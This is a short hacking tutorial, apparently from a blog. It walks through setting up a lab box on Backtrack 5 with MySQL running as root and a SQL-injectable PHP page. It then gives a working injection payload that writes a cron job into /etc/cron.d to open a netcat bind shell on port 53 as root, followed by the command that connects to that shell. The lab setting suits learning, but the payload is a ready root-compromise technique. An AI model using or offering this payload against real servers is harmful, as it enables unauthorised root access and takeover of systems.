A Brute Pwn - Rooting a Box via SQLi when MySQL Runs as Root Steps (using Backtrack 5 r3): 1) Start Apache service: root@bt:~# service apache2 start 2) Start MySQL service as root: root@bt:~# sed -i 's/= mysql/= root/1' /etc/mysql/my.cnf && start mysql 3) Create database: root@bt:~# mysql -u root -ptoor mysql> create database News; mysql> use News; mysql> create table Content (id INT not null auto_increment primary key, data VARCHAR (100)); mysql> insert into Content (data) values ('a lot of words 1'); /* repeat above step replacing 1 with 2,3,4 and 5 */ mysql> select * from Content; 4) Create PHP vulnerable page on server root: root@bt:~# nano /var/www/page.php ---[copy & paste the code below]--- ---[Save with "Ctrl+X" then "y" & ENTER]--- 4) Open firefox browser & navigate to http://localhost/page.php?id=1 to see if it is working properly. 5) Use another machine or VM to be the attacker. If you don't have one follow these steps: - Install KVM root@bt:~# apt-get install kvm - Download Tiny Core Linux root@bt:~# wget http://tinycorelinux.net/4.x/x86/release/Core-current.iso - Run VM root@bt:~# kvm --cdrom Core-current.iso & - Wait Tiny Core boot and then install curl tc@box:~$ tce-load -wi curl 6) Request the following URL with a SQL injection replacing [TARGET] with your Backtrack internal IP (all in 1 line): tc@box:~$ curl "[TARGET]/page.php?id=0+union+select'*%20*%20*%20*%20*%20root%20/bin/nc%20-lp53%20-e%20/bin/sh'into+outfile'/etc/cron.d/s'" 7) Wait some seconds (max 1 min) until target opens port 53 and run: tc@box:~$ nc [TARGET] 53 Don't learn to HACK, hack to LEARN.